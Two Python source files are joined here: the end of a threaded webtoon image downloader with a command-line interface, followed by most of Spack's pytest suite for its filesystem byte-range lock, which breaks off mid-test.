break
ep_name, dirname, headers, urls = job # TODO:Queue structure
if not os.path.exists(dirname):
os.makedirs(dirname)
logger.debug('[%d] Downloading #%s to %s' % (tid, ep_name, dirname))
counter = 1
for url in urls:
resp = requests.get(url, headers=headers)
path = dirname + '/' + str(counter) + parse_extension(url)
with open(path, 'wb') as image:
for chunk in resp.iter_content(1024):
image.write(chunk)
counter = counter + 1
logger.info('%d/%d downloaded (%s)' % (_total - q.qsize() + 1, _total, ep_name))
q.task_done()
def find_provider(url):
for pattern, module in mapping:
try:
match = url.find(pattern) > -1
except TypeError:
match = pattern(url)
if match:
logger.info('Using provider %s' % module)
return importlib.import_module('.' + module,
package='webtoon_dl.providers')
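# Shape of the assumed ``mapping`` iterable (entries here are illustrative
# only): each item pairs a substring pattern or a callable predicate with a
# provider module name under webtoon_dl.providers, e.g.
# mapping = [
#     ('example-comics.com', 'example_provider'),         # substring match
#     (lambda url: 'another.example' in url, 'another'),  # callable predicate
# ]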
@click.command()
@click.option('--count', '-c', default=0, help='Episodes to download. Unlimited if 0.')
@click.option('-j', default=8, help='Maximum count of threads.')
@click.option('--dest', '-d', type=click.Path(), default='.',
help='Path to directory to download comic. Defaults to current directory.')
@click.option('--verbosity', default=1, type=click.IntRange(min=0, max=2, clamp=True),
help='Verbosity, 0 to 2. Defaults to 1')
@click.argument('url')
def main(count, url, j, dest, verbosity):
"""
A blazing fast webtoon downloader.
"""
global _total, _terminated
logger.setLevel(30 - verbosity * 10)
provider = find_provider(url)
# Start workers
threads = []
q = queue.Queue()
for i in range(j):
t = threading.Thread(target=worker, args=(q,))
t.start()
threads.append(t)
episode_url = url
current = 1
html_src = requests.get(episode_url).text # TODO: Custom header & cookie
provider.initialize(url)
dirname = os.path.join(dest, provider.get_dirname(html_src))
req_header = provider.build_header(html_src, episode_url)
ep_name = sanitize_filename(provider.get_episode_name(html_src))
q.put((ep_name, dirname + ep_name, req_header, provider.get_image_list(html_src)))
logger.debug("Dirname: " + dirname)
logger.info("Downloading to: %s", os.path.normpath(dirname))
while current != count:
try:
logger.debug("Enqueued %s" % ep_name)
episode_url = provider.get_next_episode_url(html_src)
html_src = requests.get(episode_url).text
req_header = provider.build_header(html_src, episode_url)
ep_name = sanitize_filename(provider.get_episode_name(html_src))
_total = _total + 1
current = current + 1
q.put((ep_name, dirname + ep_name, req_header, provider.get_image_list(html_src)))
except exceptions.EndOfComic:
logger.debug("End of comic")
break
except KeyboardInterrupt:
click.echo("Aborted!")
break
logger.debug('Signalling termination')
for i in threads:
q.put(None)
logger.debug('Waiting for queue to empty out')
try:
q.join()
except KeyboardInterrupt:
logger.debug("Panic")
_terminated = True
if __name__ == "__main__":
main()
|
lock.py
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""These tests ensure that our lock works correctly.
This can be run in two ways.
First, it can be run as a node-local test, with a typical invocation like
this::
spack test lock
You can *also* run it as an MPI program, which allows you to test locks
across nodes. So, e.g., you can run the test like this::
mpirun -n 7 spack test lock
And it will test locking correctness among MPI processes. Ideally, you
want the MPI processes to span across multiple nodes, so, e.g., for SLURM
you might do this::
srun -N 7 -n 7 -m cyclic spack test lock
You can use this to test whether your shared filesystem properly supports
POSIX reader-writer locking with byte ranges through fcntl.
If you want to test on multiple filesystems, you can modify the
``locations`` list below. By default it looks like this::
locations = [
tempfile.gettempdir(), # standard tmp directory (potentially local)
'/nfs/tmp2/%u', # NFS tmp mount
'/p/lscratch*/%u' # Lustre scratch mount
]
Add names and paths for your preferred filesystem mounts to test on them;
the tests are parametrized to run on all the filesystems listed in this
list. Note that 'tmp' will be skipped for MPI testing, as it is often a
node-local filesystem, and multi-node tests will fail if the locks aren't
actually on a shared filesystem.
"""
import collections
import os
import socket
import shutil
import tempfile
import traceback
import glob
import getpass
from contextlib import contextmanager
from multiprocessing import Process, Queue
import pytest
import llnl.util.lock as lk
import llnl.util.multiproc as mp
from llnl.util.filesystem import touch
#
# This test can be run with MPI. MPI is "enabled" if we can import
# mpi4py and the number of total MPI processes is greater than 1.
# Otherwise it just runs as a node-local test.
#
# NOTE: MPI mode is different from node-local mode in that node-local
# mode will spawn its own test processes, while MPI mode assumes you've
# run this script as a SPMD application. In MPI mode, no additional
# processes are spawned, and you need to ensure that you mpirun the
# script with enough processes for all the multiproc_test cases below.
#
# If you don't run with enough processes, tests that require more
# processes than you currently have will be skipped.
#
mpi = False
comm = None
try:
from mpi4py import MPI
comm = MPI.COMM_WORLD
if comm.size > 1:
mpi = True
except ImportError:
pass
"""This is a list of filesystem locations to test locks in. Paths are
expanded so that %u is replaced with the current username. '~' is also
legal and will be expanded to the user's home directory.
Tests are skipped for directories that don't exist, so you'll need to
update this with the locations of NFS, Lustre, and other mounts on your
system.
"""
locations = [
tempfile.gettempdir(),
os.path.join('/nfs/tmp2/', getpass.getuser()),
os.path.join('/p/lscratch*/', getpass.getuser()),
]
"""This is the longest a failed multiproc test will take.
Barriers will time out and raise an exception after this interval.
In MPI mode, barriers don't time out (they hang). See mpi_multiproc_test.
"""
barrier_timeout = 5
"""This is the lock timeout for expected failures.
This may need to be higher for some filesystems."""
lock_fail_timeout = 0.1
def make_readable(*paths):
for path in paths:
mode = 0o555 if os.path.isdir(path) else 0o444
os.chmod(path, mode)
def make_writable(*paths):
for path in paths:
mode = 0o755 if os.path.isdir(path) else 0o744
os.chmod(path, mode)
@contextmanager
def read_only(*paths):
modes = [os.stat(p).st_mode for p in paths]
make_readable(*paths)
yield
for path, mode in zip(paths, modes):
os.chmod(path, mode)
@pytest.fixture(scope='session', params=locations)
def lock_test_directory(request):
"""This fixture causes tests to be executed for many different mounts.
See the ``locations`` list above for details.
"""
return request.param
@pytest.fixture(scope='session')
def lock_dir(lock_test_directory):
parent = next((p for p in glob.glob(lock_test_directory)
if os.path.exists(p) and os.access(p, os.W_OK)), None)
if not parent:
# Skip filesystems that don't exist or aren't writable
pytest.skip("requires filesystem: '%s'" % lock_test_directory)
elif mpi and parent == tempfile.gettempdir():
# Skip local tmp test for MPI runs
pytest.skip("skipping local tmp directory for MPI test.")
tempdir = None
if not mpi or comm.rank == 0:
tempdir = tempfile.mkdtemp(dir=parent)
if mpi:
tempdir = comm.bcast(tempdir)
yield tempdir
if mpi:
# rank 0 may get here before others, in which case it'll try to
# remove the directory while other processes try to re-create the
# lock. This will give errno 39: directory not empty. Use a
# barrier to ensure everyone is done first.
comm.barrier()
if not mpi or comm.rank == 0:
make_writable(tempdir)
shutil.rmtree(tempdir)
@pytest.fixture
def private_lock_path(lock_dir):
"""In MPI mode, this is a private lock for each rank in a multiproc test.
For other modes, it is the same as a shared lock.
"""
lock_file = os.path.join(lock_dir, 'lockfile')
if mpi:
lock_file += '.%s' % comm.rank
yield lock_file
if os.path.exists(lock_file):
make_writable(lock_dir, lock_file)
os.unlink(lock_file)
@pytest.fixture
def lock_path(lock_dir):
"""This lock is shared among all processes in a multiproc test."""
lock_file = os.path.join(lock_dir, 'lockfile')
yield lock_file
if os.path.exists(lock_file):
make_writable(lock_dir, lock_file)
os.unlink(lock_file)
def test_poll_interval_generator():
interval_iter = iter(
lk.Lock._poll_interval_generator(_wait_times=[1, 2, 3]))
intervals = list(next(interval_iter) for i in range(100))
assert intervals == [1] * 20 + [2] * 40 + [3] * 40
def local_multiproc_test(*functions, **kwargs):
"""Order some processes using simple barrier synchronization."""
b = mp.Barrier(len(functions), timeout=barrier_timeout)
args = (b,) + tuple(kwargs.get('extra_args', ()))
procs = [Process(target=f, args=args, name=f.__name__)
for f in functions]
for p in procs:
p.start()
for p in procs:
p.join()
assert all(p.exitcode == 0 for p in procs)
def mpi_multiproc_test(*functions):
"""SPMD version of multiproc test.
This needs to be run like so:
srun spack test lock
Each process executes its corresponding function. This is different
from ``multiproc_test`` above, which spawns the processes. This will
skip tests if there are too few processes to run them.
"""
procs = len(functions)
if procs > comm.size:
pytest.skip("requires at least %d MPI processes" % procs)
comm.Barrier() # barrier before each MPI test
include = comm.rank < len(functions)
subcomm = comm.Split(include)
class subcomm_barrier(object):
"""Stand-in for multiproc barrier for MPI-parallel jobs."""
def wait(self):
subcomm.Barrier()
if include:
try:
functions[subcomm.rank](subcomm_barrier())
except BaseException:
# aborting is the best we can do for MPI tests without
# hanging, since we're using MPI barriers. This will fail
# early and it loses the nice pytest output, but at least it
# gets us a stacktrace on the processes that failed.
traceback.print_exc()
comm.Abort()
subcomm.Free()
comm.Barrier() # barrier after each MPI test.
"""``multiproc_test()`` should be called by tests below.
``multiproc_test()`` will work for either MPI runs or for local runs.
"""
multiproc_test = mpi_multiproc_test if mpi else local_multiproc_test
#
# Process snippets below can be composed into tests.
#
def acquire_write(lock_path, start=0, length=0):
def fn(barrier):
lock = lk.Lock(lock_path, start, length)
lock.acquire_write() # grab exclusive lock
barrier.wait()
barrier.wait() # hold the lock until timeout in other procs.
return fn
def acquire_read(lock_path, start=0, length=0):
def fn(barrier):
lock = lk.Lock(lock_path, start, length)
lock.acquire_read() # grab shared lock
barrier.wait()
barrier.wait() # hold the lock until timeout in other procs.
return fn
def timeout_write(lock_path, start=0, length=0):
def fn(barrier):
lock = lk.Lock(lock_path, start, length)
barrier.wait() # wait for lock acquire in first process
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
barrier.wait()
return fn
def timeout_read(lock_path, start=0, length=0):
def fn(barrier):
lock = lk.Lock(lock_path, start, length)
barrier.wait() # wait for lock acquire in first process
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait()
return fn
#
# Test that exclusive locks on other processes time out when an
# exclusive lock is held.
#
def test_write_lock_timeout_on_write(lock_path):
multiproc_test(
acquire_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_on_write_2(lock_path):
multiproc_test(
acquire_write(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_on_write_3(lock_path):
multiproc_test(
acquire_write(lock_path),
timeout_write(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_on_write_ranges(lock_path):
multiproc_test(
acquire_write(lock_path, 0, 1),
timeout_write(lock_path, 0, 1))
def test_write_lock_timeout_on_write_ranges_2(lock_path):
multiproc_test(
acquire_write(lock_path, 0, 64),
acquire_write(lock_path, 65, 1),
timeout_write(lock_path, 0, 1),
timeout_write(lock_path, 63, 1))
def test_write_lock_timeout_on_write_ranges_3(lock_path):
multiproc_test(
acquire_write(lock_path, 0, 1),
acquire_write(lock_path, 1, 1),
timeout_write(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_on_write_ranges_4(lock_path):
multiproc_test(
acquire_write(lock_path, 0, 1),
acquire_write(lock_path, 1, 1),
acquire_write(lock_path, 2, 456),
acquire_write(lock_path, 500, 64),
timeout_write(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
#
# Test that shared locks on other processes time out when an
# exclusive lock is held.
#
def test_read_lock_timeout_on_write(lock_path):
multiproc_test(
acquire_write(lock_path),
timeout_read(lock_path))
def test_read_lock_timeout_on_write_2(lock_path):
multiproc_test(
acquire_write(lock_path),
timeout_read(lock_path),
timeout_read(lock_path))
def test_read_lock_timeout_on_write_3(lock_path):
multiproc_test(
acquire_write(lock_path),
timeout_read(lock_path),
timeout_read(lock_path),
timeout_read(lock_path))
def test_read_lock_timeout_on_write_ranges(lock_path):
"""small write lock, read whole file."""
multiproc_test(
acquire_write(lock_path, 0, 1),
timeout_read(lock_path))
def test_read_lock_timeout_on_write_ranges_2(lock_path):
"""small write lock, small read lock"""
multiproc_test(
acquire_write(lock_path, 0, 1),
timeout_read(lock_path, 0, 1))
def test_read_lock_timeout_on_write_ranges_3(lock_path):
"""two write locks, overlapping read locks"""
multiproc_test(
acquire_write(lock_path, 0, 1),
acquire_write(lock_path, 64, 128),
timeout_read(lock_path, 0, 1),
timeout_read(lock_path, 128, 256))
#
# Test that exclusive locks time out when shared locks are held.
#
def test_write_lock_timeout_on_read(lock_path):
multiproc_test(
acquire_read(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_on_read_2(lock_path):
multiproc_test(
acquire_read(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_on_read_3(lock_path):
multiproc_test(
acquire_read(lock_path),
timeout_write(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_on_read_ranges(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 1),
timeout_write(lock_path))
def test_write_lock_timeout_on_read_ranges_2(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 1),
timeout_write(lock_path, 0, 1))
def test_write_lock_timeout_on_read_ranges_3(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 1),
acquire_read(lock_path, 10, 1),
timeout_write(lock_path, 0, 1),
timeout_write(lock_path, 10, 1))
def test_write_lock_timeout_on_read_ranges_4(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 64),
timeout_write(lock_path, 10, 1),
timeout_write(lock_path, 32, 1))
def test_write_lock_timeout_on_read_ranges_5(lock_path):
multiproc_test(
acquire_read(lock_path, 64, 128),
timeout_write(lock_path, 65, 1),
timeout_write(lock_path, 127, 1),
timeout_write(lock_path, 90, 10))
#
# Test that exclusive locks time out while lots of shared locks are held.
#
def test_write_lock_timeout_with_multiple_readers_2_1(lock_path):
multiproc_test(
acquire_read(lock_path),
acquire_read(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_with_multiple_readers_2_2(lock_path):
multiproc_test(
acquire_read(lock_path),
acquire_read(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_with_multiple_readers_3_1(lock_path):
multiproc_test(
acquire_read(lock_path),
acquire_read(lock_path),
acquire_read(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_with_multiple_readers_3_2(lock_path):
multiproc_test(
acquire_read(lock_path),
acquire_read(lock_path),
acquire_read(lock_path),
timeout_write(lock_path),
timeout_write(lock_path))
def test_write_lock_timeout_with_multiple_readers_2_1_ranges(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 10),
acquire_read(lock_path, 0.5, 10),
timeout_write(lock_path, 5, 5))
def test_write_lock_timeout_with_multiple_readers_2_3_ranges(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 10),
acquire_read(lock_path, 5, 15),
timeout_write(lock_path, 0, 1),
timeout_write(lock_path, 11, 3),
timeout_write(lock_path, 7, 1))
def test_write_lock_timeout_with_multiple_readers_3_1_ranges(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 5),
acquire_read(lock_path, 5, 5),
acquire_read(lock_path, 10, 5),
timeout_write(lock_path, 0, 15))
def test_write_lock_timeout_with_multiple_readers_3_2_ranges(lock_path):
multiproc_test(
acquire_read(lock_path, 0, 5),
acquire_read(lock_path, 5, 5),
acquire_read(lock_path, 10, 5),
timeout_write(lock_path, 3, 10),
timeout_write(lock_path, 5, 1))
@pytest.mark.skipif(os.getuid() == 0, reason='user is root')
def test_read_lock_on_read_only_lockfile(lock_dir, lock_path):
"""read-only directory, read-only lockfile."""
touch(lock_path)
with read_only(lock_path, lock_dir):
lock = lk.Lock(lock_path)
with lk.ReadTransaction(lock):
pass
with pytest.raises(lk.LockROFileError):
with lk.WriteTransaction(lock):
pass
def test_read_lock_read_only_dir_writable_lockfile(lock_dir, lock_path):
"""read-only directory, writable lockfile."""
touch(lock_path)
with read_only(lock_dir):
lock = lk.Lock(lock_path)
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
@pytest.mark.skipif(os.getuid() == 0, reason='user is root')
def test_read_lock_no_lockfile(lock_dir, lock_path):
"""read-only directory, no lockfile (so can't create)."""
with read_only(lock_dir):
lock = lk.Lock(lock_path)
with pytest.raises(lk.CantCreateLockError):
with lk.ReadTransaction(lock):
pass
with pytest.raises(lk.CantCreateLockError):
with lk.WriteTransaction(lock):
pass
def test_upgrade_read_to_write(private_lock_path):
"""Test that a read lock can be upgraded to a write lock.
Note that to upgrade a read lock to a write lock, you have the be the
only holder of a read lock. Client code needs to coordinate that for
shared locks. For this test, we use a private lock just to test that an
upgrade is possible.
"""
# ensure lock file exists the first time, so we open it read-only
# to begin with.
touch(private_lock_path)
lock = lk.Lock(private_lock_path)
assert lock._reads == 0
assert lock._writes == 0
lock.acquire_read()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r+'
lock.acquire_write()
assert lock._reads == 1
assert lock._writes == 1
assert lock._file.mode == 'r+'
lock.release_write()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r+'
lock.release_read()
assert lock._reads == 0
assert lock._writes == 0
assert lock._file is None
def test_upgrade_read_to_write_fails_with_readonly_file(private_lock_path):
"""Test that read-only file can be read-locked but not write-locked."""
# ensure lock file exists the first time
touch(private_lock_path)
# open it read-only to begin with.
with read_only(private_lock_path):
lock = lk.Lock(private_lock_path)
assert lock._reads == 0
assert lock._writes == 0
lock.acquire_read()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r'
# upgrading to write here should fail
with pytest.raises(lk.LockROFileError):
lock.acquire_write()
#
# Longer test case that ensures locks are reusable. Ordering is
# enforced by barriers throughout -- steps are shown with numbers.
#
def test_complex_acquire_and_release_chain(lock_path):
def p1(barrier):
lock = lk.Lock(lock_path)
lock.acquire_write()
barrier.wait() # ---------------------------------------- 1
# others test timeout
barrier.wait() # ---------------------------------------- 2
lock.release_write() # release and others acquire read
barrier.wait() # ---------------------------------------- 3
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
lock.acquire_read()
barrier.wait() # ---------------------------------------- 4
lock.release_read()
barrier.wait() # ---------------------------------------- 5
# p2 upgrades read to write
barrier.wait() # ---------------------------------------- 6
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 7
# p2 releases write and read
barrier.wait() # ---------------------------------------- 8
# p3 acquires read
barrier.wait() # ---------------------------------------- 9
# p3 upgrades read to write
barrier.wait() # ---------------------------------------- 10
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 11
# p3 releases locks
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
def p2(barrier):
lock = lk.Lock(lock_path)
# p1 acquires write
barrier.wait() # ---------------------------------------- 1
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 2
lock.acquire_read()
barrier.wait() # ---------------------------------------- 3
# p1 tests shared read
barrier.wait() # ---------------------------------------- 4
# others release reads
barrier.wait() # ---------------------------------------- 5
lock.acquire_write() # upgrade read to write
barrier.wait() # ---------------------------------------- 6
# others test timeout
barrier.wait() # ---------------------------------------- 7
lock.release_write() # release read AND write (need both)
lock.release_read()
barrier.wait() # ---------------------------------------- 8
# p3 acquires read
barrier.wait() # ---------------------------------------- 9
# p3 upgrades read to write
barrier.wait() # ---------------------------------------- 10
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 11
# p3 releases locks
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
def p3(barrier):
lock = lk.Lock(lock_path)
# p1 acquires write
barrier.wait() # ---------------------------------------- 1
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 2
lock.acquire_read()
barrier.wait() # ---------------------------------------- 3
# p1 tests shared read
barrier.wait() # ---------------------------------------- 4
lock.release_read()
barrier.wait() # ---------------------------------------- 5
# p2 upgrades read to write
barrier.wait() # ---------------------------------------- 6
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 7
# p2 releases write & read
barrier.wait() # ---------------------------------------- 8
lock.acquire_read()
barrier.wait() # ---------------------------------------- 9
lock.acquire_write()
barrier.wait() # ---------------------------------------- 10
# others test timeout
barrier.wait() # ---------------------------------------- 11
lock.release_read() # release read AND write in opposite
lock.release_write() # order from before on p2
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
multiproc_test(p1, p2, p3)
class AssertLock(lk.Lock):
"""Test lock class that marks acquire/release events."""
def __init__(self, lock_path, vals):
super(AssertLock, self).__init__(lock_path)
self.vals = vals
# assert hooks for subclasses
assert_acquire_read = lambda self: None
assert_acquire_write = lambda self: None
assert_release_read = lambda self: None
assert_release_write = lambda self: None
def acquire_read(self, timeout=None):
self.assert_acquire_read()
result = super(AssertLock, self).acquire_read(timeout)
self.vals['acquired_read'] = True
return result
def acquire_write(self, timeout=None):
self.assert_acquire_write()
result = super(AssertLock, self).acquire_write(timeout)
self.vals['acquired_write'] = True
return result
def release_read(self, release_fn=None):
self.assert_release_read()
result = super(AssertLock, self).release_read(release_fn)
self.vals['released_read'] = True
return result
def release_write(self, release_fn=None):
self.assert_release_write()
result = super(AssertLock, self).release_write(release_fn)
self.vals['released_write'] = True
return result
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_read(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def assert_acquire_write(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_write(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def enter_fn():
# assert enter_fn is called while lock is held
assert vals['acquired_%s' % type]
vals['entered_fn'] = True
def exit_fn(t, v, tb):
# assert exit_fn is called while lock is held
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception'] = (t or v or tb)
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with transaction(lock, acquire=enter_fn, release=exit_fn):
assert vals['acquired_%s' % type]
assert not vals['released_%s' % type]
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['acquired_%s' % type]
assert vals['released_%s' % type]
assert not vals['exception']
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction_with_exception(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_read(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def assert_acquire_write(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_write(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def enter_fn():
assert vals['acquired_%s' % type]
vals['entered_fn'] = True
def exit_fn(t, v, tb):
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception'] = (t or v or tb)
return exit_result
exit_result = False
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with pytest.raises(Exception):
with transaction(lock, acquire=enter_fn, release=exit_fn):
raise Exception()
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['exception']
# test suppression of exceptions from exit_fn
exit_result = True
vals.clear()
# should not raise now.
with transaction(lock, acquire=enter_fn, release=exit_fn):
raise Exception()
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['exception']
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction_with_context_manager(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_ctx']
assert not vals['exited_ctx']
def assert_release_read(self):
assert vals['entered_ctx']
assert vals['exited_ctx']
def assert_acquire_write(self):
assert not vals['entered_ctx']
assert not vals['exited_ctx']
def assert_release_write(self):
assert vals['entered_ctx']
assert vals['exited_ctx']
class TestContextManager(object):
def __enter__(self):
vals['entered_ctx'] = True
def __exit__(self, t, v, tb):
assert not vals['released_%s' % type]
vals['exited_ctx'] = True
vals['exception_ctx'] = (t or v or tb)
return exit_ctx_result
def exit_fn(t, v, tb):
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception_fn'] = (t or v or tb)
return exit_fn_result
exit_fn_result, exit_ctx_result = False, False
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with transaction(lock, acquire=TestContextManager, release=exit_fn):
pass
assert vals['entered_ctx']
assert vals['exited_ctx']
assert vals['exited_fn']
assert not vals['exception_ctx']
assert not vals['exception_fn']
vals.clear()
with transaction(lock, acquire=TestContextManager):
pass
assert vals['entered_ctx']
assert vals['exited_ctx']
assert not vals['exited_fn']
assert not vals['exception_ctx']
assert not vals['exception_fn']
# below are tests for exceptions with and without suppression
def assert_ctx_and_fn_exception(raises=True):
vals.clear()
if raises:
with pytest.raises(Exception):
with transaction(
lock, acquire=TestContextManager, release=exit_fn):
raise Exception()
else:
with transaction(
lock, acquire=TestContextManager, release=exit_fn):
raise Exception()
assert vals['entered_ctx']
assert vals['exited_ctx']
assert vals['exited_fn']
assert vals['exception_ctx']
assert vals['exception_fn']
def assert_only_ctx_exception(raises=True):
vals.clear()
if raises:
with pytest.raises(Exception):
with transaction(lock, acquire=TestContextManager):
raise Exception()
else:
with transaction(lock, acquire=TestContextManager):
raise Exception()
assert vals['entered_ctx']
assert vals['exited_ctx']
assert not vals['exited_fn']
assert vals['exception_ctx']
assert not vals['exception_fn']
# no suppression
assert_ctx_and_fn_exception(raises=True)
assert_only_ctx_exception(raises=True)
# suppress exception only in function
exit_fn_result, exit_ctx_result = True, False
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=True)
# suppress exception only in context
exit_fn_result, exit_ctx_result = False, True
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=False)
# suppress exception in function and context
exit_fn_result, exit_ctx_result = True, True
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=False)
def test_nested_write_transaction(lock_path):
"""Ensure that the outermost write transaction writes."""
def write(t, v, tb):
vals['wrote'] = True
vals = collections.defaultdict(lambda: False)
lock = AssertLock(lock_path, vals)
# write/write
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
# read/write
vals.clear()
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert vals['wrote']
# write/read/write
vals.clear()
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
# read/write/read/write
vals.clear()
with lk.ReadTransaction(lock):
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
def test_nested_reads(lock_path):
"""Ensure that write transactions won't re-read data."""
def read():
vals['read'] += 1
vals = collections.defaultdict(lambda: 0)
lock = AssertLock(lock_path, vals)
# read/read
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
# write/write
vals.clear()
assert vals['read'] == 0
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# read/write
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# write/read/write
vals.clear()
assert vals['read'] == 0
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# read/write/read/write
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
def test_lock_debug_output(lock_path):
host = socket.getfqdn()
def p1(barrier, q1, q2):
# exchange pids
p1_pid = os.getpid()
q1.put(p1_pid)
p2_pid = q2.get()
# set up lock
lock = lk.Lock(lock_path, debug=True)
with lk.WriteTransaction(lock):
# p1 takes write lock and writes pid/host to file
barrier.wait() # ------------------------------------ 1
assert lock.pid == p1_pid
assert lock.host == host
# wait for p2 to verify contents of file
barrier.wait() # ---------------------------------------- 2
# wait for p2 to take a write lock
barrier.wait() # ---------------------------------------- 3
# verify pid/host info again
with lk.ReadTransaction(lock):
assert lock.old_pid == p1_pid
assert lock.old_host == host
assert lock.pid == p2_pid
assert lock.host == host
barrier.wait() # ---------------------------------------- 4
def p2(barrier, q1, q2):
# exchange pids
p2_pid = os.getpid()
